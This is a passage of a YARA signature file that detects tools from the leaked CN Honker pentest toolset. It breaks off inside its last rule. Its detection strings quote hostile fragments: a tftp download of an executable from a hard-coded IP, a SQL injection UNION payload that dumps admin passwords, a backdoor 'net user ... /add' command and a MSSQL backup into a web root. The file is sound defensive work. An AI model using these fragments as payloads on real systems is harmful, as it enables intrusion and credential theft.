/*
    Yara Rule Set
    Author: Florian Roth
    Date: 2015-06-23
    Identifier: CN-PentestSet
*/

/* Rule Set ----------------------------------------------------------------- */

rule CN_Honker_MAC_IPMAC {
    /* IPMAC.exe from the CN Honker toolset: a PE (MZ) file under 267KB
       that carries all three strings below. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file IPMAC.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "24d55b6bec5c9fff4cd6f345bacac7abadce1611"
        id = "5424d3a7-765a-5dfb-9177-d5633f83079f"
    strings:
        $s1 = "Http://Www.YrYz.Net" fullword wide
        $s2 = "IpMac.txt" fullword ascii
        /* A bare private-range address is weak evidence on its own; the
           condition only accepts it together with $s1 and $s2. */
        $s3 = "192.168.0.1" fullword ascii
    condition:
        /* 0x5a4d at offset 0 is the little-endian "MZ" DOS/PE magic. */
        uint16(0) == 0x5a4d and filesize < 267KB and all of them
}

rule CN_Honker_GetSyskey {
    /* GetSyskey.exe from the CN Honker toolset. Both strings are the tool's
       own usage banner and success message, which reference reading a
       SYSTEM registry hive and writing a system key file (credential-access
       tooling). */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "17cec5e75cda434d0a1bc8cdd5aa268b42633fe9"
        id = "08f5b5b1-3085-5bf1-9789-023be5a039f8"
    strings:
        $s2 = "GetSyskey <SYSTEM registry file> [Output system key file]" fullword ascii /* PEStudio Blacklist: strings */
        $s4 = "The system key file \"%s\" is created." fullword ascii /* PEStudio Blacklist: strings */
    condition:
        /* MZ header, small binary (< 40KB), both strings required. */
        uint16(0) == 0x5a4d and filesize < 40KB and all of them
}

rule CN_Honker_Churrasco {
    /* Churrasco.exe from the CN Honker toolset. $s16/$s17 are ordinary
       imported API names that also occur in goodware (counts noted inline);
       specificity comes from requiring every string, including the
       misspelled artefacts $s1/$s6 and the "HEAD9 /" fragment. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Churrasco.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "5a3c935d82a5ff0546eff51bb2ef21c88198f5b8"
        id = "58873cd6-0c9e-58a0-923a-aca8a1d42017"
    strings:
        $s0 = "HEAD9 /" ascii
        $s1 = "logic_er" fullword ascii
        $s6 = "proggam" fullword ascii
        $s16 = "DtcGetTransactionManagerExA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 12 times */
        $s17 = "GetUserNameA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 305 times */
        $s18 = "OLEAUT" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1276KB and all of them
}

rule CN_Honker_mysql_injectV1_1_Creak {
    /* mysql_injectV1.1_Creak.exe from the CN Honker toolset. $s0 is a
       hard-coded example target URL (note the leading "1" is part of the
       string as found in the sample); $s1 is a method/handler name. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file mysql_injectV1.1_Creak.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "a1f066789f48a76023598c5777752c15f91b76b0"
        id = "39025a57-557a-53c0-bfdb-81fe83f824af"
    strings:
        $s0 = "1http://192.169.200.200:2217/mysql_inject.php?id=1" fullword ascii /* PEStudio Blacklist: strings */
        $s12 = "OnGetPassword" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        /* Generous size cap (< 5890KB); both strings are required. */
        uint16(0) == 0x5a4d and filesize < 5890KB and all of them
}

rule CN_Honker_ASP_wshell {
    /* wshell.txt from the CN Honker toolset: an ASP page whose script block
       is declared as VBScript.Encode (encoded script). $s1-$s3 carry no
       modifiers, so they match as plain ascii substrings anywhere in the
       file. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file wshell.txt"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "3ae33c835e7ea6d9df74fe99fcf1e2fb9490c978"
        id = "028136cd-129b-5d58-a4c2-ba730a798c06"
    strings:
        $s0 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "UserPass="
        $s2 = "VerName="
        $s3 = "StateName="
    condition:
        /* 0x253c at offset 0 is the little-endian "<%" -- the file must
           begin with an ASP open tag. */
        uint16(0) == 0x253c and filesize < 200KB and all of them
}

rule CN_Honker_exp_iis7 {
    /* iis7.exe from the CN Honker toolset. $s4 is a common window-station
       path seen in goodware (count noted inline); the misspelled error
       text in $s3 and the "iis.run" marker give the rule its specificity. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file iis7.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
        id = "edfafc9a-032a-5ccb-9a1f-faeab0dfa31d"
    strings:
        $s0 = "\\\\localhost" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "iis.run" fullword ascii
        $s3 = ">Could not connecto %s" fullword ascii /* PEStudio Blacklist: strings */
        $s4 = "WinSta0\\Default" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 22 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 60KB and all of them
}

rule CN_Honker_SegmentWeapon {
    /* SegmentWeapon.exe from the CN Honker toolset. $s0 is a full path to
       the VB6 runtime DLL (msvbvm60.dll) plus a resource suffix; $s1 is a
       hard-coded URL stored as a wide string. Both are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file SegmentWeapon.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "494ef20067a7ce2cc95260e4abc16fcfa7177fdf"
        id = "e1b6f721-4c4d-50f2-9ed6-f38e8e7ea4ab"
    strings:
        $s0 = "C:\\WINDOWS\\system32\\msvbvm60.dll\\3" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "http://www.nforange.com/inc/1.asp?" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and all of them
}

rule CN_Honker_Alien_iispwd {
    /* iispwd.vbs from the CN Honker toolset: a VBScript that enumerates
       IIsWebServer objects through ADSI ($s0). This is a script, so there
       is deliberately no MZ-header check; only the 3KB size cap and both
       strings. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file iispwd.vbs"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "5d157a1b9644adbe0b28c37d4022d88a9f58cedb"
        id = "e561c548-c656-5528-a2a8-2798a59ac6bf"
    strings:
        $s0 = "set IIs=objservice.GetObject(\"IIsWebServer\",childObjectName)" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "wscript.echo \"from : http://www.xxx.com/\" &vbTab&vbCrLf" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        filesize < 3KB and all of them
}

rule CN_Honker_Md5CrackTools {
    /* Md5CrackTools.exe from the CN Honker toolset. $s1 is a generic
       MSIE 6.0 user-agent string and would be noisy alone; the rule also
       requires the embedded HTML fragment $s2 that builds a hash-lookup
       link. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "9dfd9c9923ae6f6fe4cbfa9eb69688269285939c"
        id = "16e04a66-0f6f-5b94-97c3-df62aa9406a9"
    strings:
        $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
        $s2 = ",<a href='index.php?c=1&type=md5&hash=" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 4580KB and all of them
}

rule CN_Honker_CoolScan_scan {
    /* scan.exe (CoolScan) from the CN Honker toolset. $s0 is a regex-like
       User-agent pattern stored as a literal in the binary (the backslashes
       are escaped here so YARA matches the literal text, not a regex);
       $s1 is the tool's wide-string file name. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file scan.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "e1c5fb6b9f4e92c4264c7bea7f5fba9a5335c328"
        id = "781446d2-3363-56c3-9767-c7ac70047b68"
    strings:
        $s0 = "User-agent:\\s{0,32}(huasai|huasai/1.0|\\*)" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "scan web.exe" fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 3680KB and all of them
}

rule CN_Honker_mempodipper2_6 {
    /* mempodipper2.6.39 from the CN Honker toolset. The single string is a
       shell pipeline embedded in the sample; the file is not a PE, so the
       condition is only a 30KB size cap plus the string. A single ascii
       pattern with no header check is a comparatively thin signature. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file mempodipper2.6.39"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "ba2c79911fe48660898039591e1742b3f1a9e923"
        id = "43a27968-adab-5f27-9b8c-8f0f895f0576"
    strings:
        $s0 = "objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed" ascii /* PEStudio Blacklist: strings */
    condition:
        filesize < 30KB and all of them
}

rule CN_Honker_COOKIE_CooKie {
    /* CooKie.exe from the CN Honker toolset. $s4 is a canned SQL UNION
       payload template embedded in the tool; $s5 is its own file name as a
       wide string. Both are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file CooKie.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f7727160257e0e716e9f0cf9cdf9a87caa986cde"
        id = "5f85bb0f-6df2-512c-ba1a-8a74c1a55563"
    strings:
        $s4 = "-1 union select 1,username,password,4,5,6,7,8,9,10 from admin" fullword ascii /* PEStudio Blacklist: strings */
        $s5 = "CooKie.exe" fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 360KB and all of them
}

rule CN_Honker_wwwscan_1_wwwscan {
    /* wwwscan.exe from the CN Honker toolset. $s0 is the tool's usage
       example; $s3 is the fixed probe request it sends for a page that is
       expected not to exist (404 baseline). Both are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "6bed45629c5e54986f2d27cbfc53464108911026"
        id = "8b6a94a3-6f9c-59b2-931b-c06701b95d59"
    strings:
        $s0 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 180KB and all of them
}

rule CN_Honker_D_injection_V2_32 {
    /* D_injection_V2.32.exe from the CN Honker toolset. $s0 is a run of
       concatenated database-component error messages (wide); $s1 is a
       hard-coded tftp download command line. Both are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "3a000b976c79585f62f40f7999ef9bdd326a9513"
        id = "4c661c35-61ee-5ee7-9b8e-9908fbe0362b"
    strings:
        $s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide /* PEStudio Blacklist: strings */
        $s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 5000KB and all of them
}

rule CN_Honker_net_priv_esc2 {
    /* net-priv-esc2.exe from the CN Honker toolset: a very small PE
       (< 17KB) carrying a "username password" usage line and a site tag. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file net-priv-esc2.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "4851e0088ad38ac5b3b1c75302a73698437f7f17"
        id = "b4fa3129-57a3-55ee-8ca6-ecbcc135184e"
    strings:
        $s1 = "Usage:%s username password" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "<www.darkst.com>" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 17KB and all of them
}

rule CN_Honker_Oracle_v1_0_Oracle {
    /* Oracle.exe from the CN Honker toolset. $s3 is the default user-agent
       of the Indy networking components and appears in many legitimate
       programs; $s2 is a handler name also used by other tools in this set.
       The localhost example URL in $s1 is what pins the sample, and all
       three are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Oracle.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "0264f4efdba09eaf1e681220ba96de8498ab3580"
        id = "0cebede9-f4ff-5efb-98bc-55df0ad656a3"
    strings:
        $s1 = "!http://localhost/index.asp?id=zhr" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "OnGetPassword" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 3455KB and all of them
}

rule CN_Honker_Interception {
    /* Interception.exe from the CN Honker toolset. $s2 is a relative path
       to a companion DLL whose name suggests msgina hooking, and $s5 names
       a "WinlogonHackEx" component -- presumably a logon-credential
       interception tool (inferred from names only). */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Interception.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "ea813aed322e210ea6ae42b73b1250408bf40e7a"
        id = "40d350e5-c6af-58e2-a1d8-f9516af5f869"
    strings:
        $s2 = ".\\dat\\Hookmsgina.dll" fullword ascii /* PEStudio Blacklist: strings */
        /* Note the trailing space inside the literal; fullword still applies. */
        $s5 = "WinlogonHackEx " fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 160KB and all of them
}

rule CN_Honker_sig_3389_DUBrute_v3_0_RC3_3_0 {
    /* 3.0.exe (DUBrute v3.0 RC3) from the CN Honker toolset. $s1 and $s9
       are generic ("LOADER ERROR" also appears in the T00ls Lpk Sethc v4.0
       rule; CryptGenRandom is a common import). The forum URL launched via
       explorer.exe in $s0 is the distinguishing string; all three are
       required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file 3.0.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "49b311add0940cf183e3c7f3a41ea6e516bf8992"
        id = "994ad7e9-2019-54b3-84e6-2762a700c939"
    strings:
        $s0 = "explorer.exe http://bbs.yesmybi.net" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */
        $s9 = "CryptGenRandom" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 581 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 395KB and all of them
}

rule CN_Honker_windows_exp {
    /* exp.exe from the CN Honker toolset. $s0 is a hard-coded command
       interpreter invocation (command.com /c); $s8 is the tool's own
       length-error message. Both are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file exp.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "04334c396b165db6e18e9b76094991d681e6c993"
        id = "148900d0-cf62-5cb0-adbc-52fa8ce8832e"
    strings:
        /* Trailing space is part of the literal. */
        $s0 = "c:\\windows\\system32\\command.com /c " fullword ascii /* PEStudio Blacklist: strings */
        $s8 = "OH,Sry.Too long command." fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 220KB and all of them
}

rule CN_Honker_safe3wvs_cgiscan {
    /* cgiscan.exe (Safe3 WVS) from the CN Honker toolset. Both strings
       are wide: a module file name and the vendor domain. Note that the
       strings are vendor/product identifiers rather than malicious
       behaviour, so treat hits as "known scanner present". */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file cgiscan.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f94bbf2034ad9afa43cca3e3a20f142e0bb54d75"
        id = "a9f7a195-deb8-5887-bc55-d1b0cac43182"
    strings:
        $s2 = "httpclient.exe" fullword wide
        $s3 = "www.safe3.com.cn" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 357KB and all of them
}

rule CN_Honker_pr_debug {
    /* debug.exe from the CN Honker toolset. $s1 is a status line that
       reports a WMI process id; $s2 is the tool's own self-description,
       truncated at 64 characters, of the local account it adds. Neither is
       fullword, so they match as substrings. Both are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file debug.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
        id = "6d759818-b762-56f4-8475-82a7d18a659c"
    strings:
        $s1 = "-->Got WMI process Pid: %d " ascii /* PEStudio Blacklist: strings */
        $s2 = "This exploit will execute \"net user temp 123456 /add & net localg" ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 820KB and all of them
}

rule CN_Honker_T00ls_Lpk_Sethc_v4_0 {
    /* T00ls Lpk Sethc v4.0.exe from the CN Honker toolset. $s0 is a
       generic loader message shared with the DUBrute rule; the copyright
       string $s15 is what identifies this build. Both are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v4.0.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "98f21f72c761e504814f0a7db835a24a2413a6c2"
        id = "d41cbed5-a6e3-5165-a8c3-e0375c1ed75d"
    strings:
        $s0 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */
        $s15 = "2011-2012 T00LS&RICES" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 2077KB and all of them
}

rule CN_Honker_MatriXay1073 {
    /* MatriXay1073.exe from the CN Honker toolset. $s0 is a truncated,
       non-fullword user-agent header; $s1 a scan policy file path; $s2 a
       coloured status message about a local HTTP-to-HTTPS relay; $s3 a
       function name. All four are required, which offsets the generic
       user-agent in $s0. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file MatriXay1073.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        modified = "2023-01-27"
        score = 70
        hash = "fef951e47524f827c7698f4508ba9551359578a5"
        id = "23e73b89-f60e-5bc3-8974-15be16d7c408"
    strings:
        $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1" ascii /* PEStudio Blacklist: strings */
        $s1 = "Policy\\Scan\\GetUserLen.ini" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "!YEL!Using http://127.0.0.1:%d/ to visiter https://%s:%d/" ascii /* PEStudio Blacklist: strings */
        $s3 = "getalluserpasswordhash" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 9100KB and all of them
}

rule CN_Honker_Sword1_5 {
    /* Sword1.5.exe from the CN Honker toolset. $s2 and $s4 look like UI
       control names and $s3 is a generic settings-file suffix, so on their
       own they are weak; the md5.com.cn URL in $s1 is the anchor and all
       four are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Sword1.5.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
        id = "832e4998-64fc-5f34-a46d-aeefde0ee763"
    strings:
        $s1 = "http://www.md5.com.cn" fullword wide
        $s2 = "ListBox_Command" fullword wide /* PEStudio Blacklist: strings */
        $s3 = "\\Set.ini" wide
        $s4 = "OpenFileDialog1" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 740KB and all of them
}

rule CN_Honker_Havij_Havij {
    /* Havij.exe from the CN Honker toolset. $s1 is the injection
       placeholder Havij substitutes into a header; $s2 is a canned
       MSSQL BACKUP statement that writes into a web root. Both are
       required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Havij.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "0d8b275bd1856bc6563dd731956f3b312e1533cd"
        id = "b3640a32-b546-58c9-abb1-3da60dc6633c"
    strings:
        $s1 = "User-Agent: %Inject_Here%" fullword wide /* PEStudio Blacklist: strings */
        $s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}

rule CN_Honker_exp_ms11011 {
    /* ms11011.exe from the CN Honker toolset. $s1/$s3/$s5 are generic
       (counts noted inline) and $s2 is a fragment of the compiler "Rich"
       header; the PDB path in $s0 is the distinguishing artefact. All five
       are required, which keeps the generic strings from firing alone. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file ms11011.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
        id = "fc092166-73cd-58f6-b034-a2fe2c5fb859"
    strings:
        $s0 = "\\i386\\Hello.pdb" ascii /* PEStudio Blacklist: strings */
        $s1 = "OS not supported." fullword ascii /* PEStudio Blacklist: strings */
        $s2 = ".Rich5" fullword ascii
        $s3 = "Not supported." fullword wide /* PEStudio Blacklist: strings */ /* Goodware String - occured 3 times */
        $s5 = "cmd.exe" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 120 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and all of them
}

rule CN_Honker_DLL_passive_privilege_escalation_ws2help {
    /* ws2help.dll from the CN Honker toolset: a small (< 30KB) PE that
       names itself after a system DLL ($s1) and references a second DLL
       ($s0). The rule name describes it as a passive (DLL-placement)
       privilege escalation component. Both strings are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file ws2help.dll"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "e539b799c18d519efae6343cff362dcfd8f57f69"
        id = "85a07bb7-2856-56f0-bd15-e020bb2a7692"
    strings:
        $s0 = "PassMinDll.dll" fullword ascii
        /* Not fullword: matches the DLL name as a path suffix too. */
        $s1 = "\\ws2help.dll" ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 30KB and all of them
}

rule CN_Honker_Webshell {
    /* Webshell.exe from the CN Honker toolset. NOTE(review): all three
       strings are generic runtime messages (a SoftIce/WinIce debugger
       warning and download-dialog text) rather than anything specific to
       the tool, so this rule is presumably prone to false positives on
       other binaries that embed the same runtime -- confirm against a
       goodware corpus before deploying at score 70. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Webshell.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "c85bd09d241c2a75b4e4301091aa11ddd5ad6d59"
        id = "12870766-2b85-522d-9ad8-abba2786caaf"
    strings:
        $s1 = "Windows NT users: Please note that having the WinIce/SoftIce" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "Do you want to cancel the file download?" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "Downloading: %s" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 381KB and all of them
}

rule CN_Honker_AspxClient {
    /* AspxClient.exe from the CN Honker toolset. The condition needs any
       3 of the 4 strings, so a single missing artefact (e.g. a stripped
       PDB path) still matches. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file AspxClient.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        modified = "2022-12-21"
        score = 70
        hash = "67569a89128f503a459eab3daa2032261507f2d2"
        id = "7e38365c-ffe5-5fcd-8bd6-948d255d6e10"
    strings:
        $s1 = "\\tools\\hashq\\hashq.exe" wide
        $s2 = "\\Release\\CnCerT.CCdoor.Client.pdb" ascii
        $s3 = "\\myshell.mdb" wide /* PEStudio Blacklist: strings */
        $s4 = "injectfile" fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and 3 of them
}

rule CN_Honker_Fckeditor {
    /* Fckeditor.exe from the CN Honker toolset. $s0 is a hard-coded
       explorer.exe launch of a personal page URL; $s7 is the tool's own
       file name. Both are wide and both are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "4b16ae12c204f64265acef872526b27111b68820"
        id = "eb8767cb-b081-5c37-b7ad-57a0de047462"
    strings:
        $s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide /* PEStudio Blacklist: strings */
        $s7 = "Fckeditor.exe" fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 1340KB and all of them
}

rule CN_Honker_Codeeer_Explorer {
    /* Codeeer Explorer.exe from the CN Honker toolset. $s2 is the file's
       own name (wide); $s12 is an event-handler name for an embedded
       browser control. Both are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f32e05f3fefbaa2791dd750e4a3812581ce0f205"
        id = "d4a88ae7-c0b2-57d2-a070-3dd748a30a3a"
    strings:
        $s2 = "Codeeer Explorer.exe" fullword wide /* PEStudio Blacklist: strings */
